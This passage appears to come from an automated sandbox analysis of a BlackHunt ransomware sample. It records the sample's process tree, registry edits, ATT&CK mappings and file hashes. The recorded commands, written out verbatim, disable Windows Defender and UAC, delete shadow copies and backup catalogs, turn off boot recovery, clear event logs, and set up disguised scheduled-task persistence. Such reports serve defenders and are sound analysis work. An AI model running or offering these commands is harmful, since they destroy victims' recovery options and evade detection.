memory of 2720 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 34 PID 3040 wrote to memory of 2720 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 34 PID 3040 wrote to memory of 2720 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 34 PID 2784 wrote to memory of 2644 2784 cmd.exe 37 PID 2784 wrote to memory of 2644 2784 cmd.exe 37 PID 2784 wrote to memory of 2644 2784 cmd.exe 37 PID 3040 wrote to memory of 2804 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 36 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe"C:\Users\Admin\AppData\Local\Temp\cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3040 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2268
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2040
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe" /F2⤵PID:2920
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe" /F3⤵
- Creates scheduled task(s)
PID:912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:628
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1228
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1676
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1196
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2144
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3064
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3052
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2952
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2580
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2944
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2192
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2700
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2712
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1844
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1060
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3004
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2568
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:540
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:752
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1112
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:636
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:560
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:868
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:804
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3232
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3248
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2772
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2404
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3300
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3324
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3244
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2308
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1988
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3848
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3392
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:336
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3772
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe"2⤵
- Deletes itself
PID:3332 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3160
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3476
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3224
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2060
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2704
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2812
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3456
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2052
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2872
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:2864
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:2876
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1968
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:1952
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:1356
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:1344
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:1380
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:2940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:2616
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵PID:2976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2728
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵
- Modifies registry class
PID:2976
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2432
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3520
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1612
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD50cede07f24d3bf46bff7a86acaef469c
SHA1716c6a4d644467f69a8b94e67d50d793e40e6a7a
SHA2560d1be858476eef026b1b6355b2ab694bdaf86782575df422ed246852fe373a37
SHA512ffb4dea1cb595f5fa50bfb0d6d8712944d2f056da63381ea2778a20f3235eb990e605f13d986a6d0ca1b23506c376a97756c328e818e3710e12cf8b5ec7d1f8e
-
Filesize
684B
MD53650e8a20361609fe83cb174e34a744a
SHA1bf14092380d5eafbc2141419c9aa8fe29c23cb52
SHA256cc631a30f58d749d6581b8194fb70896f4e5f6a6c0c007118a46192db526fb0d
SHA5127aaabe0f3a2f0aa4a4ae8d0b5f74ca46b59ce36f80600e843fb8189f6b7c9868a3c790e4d31d55c4dfb4055e835ff14ea65807fb4a1355ebb3b5ab8a5619f058
-
Filesize
1KB
MD5d6bb59d975071348514bcfe620321503
SHA107c92456ad53a9c4402f1d0572164b4498282d66
SHA2562f6afea439d7a6ab070da07c45231952caa50ac233de0218ca7e5af5bacddb40
SHA5125dd8ab9798b1c010a9c5b94d8b24b7e8c410a89ff2da1df456500fafa91e37a7281ed180d921268df5c71b390a184ac6f27d2e98b628fc2c3cd46d3354cd0a27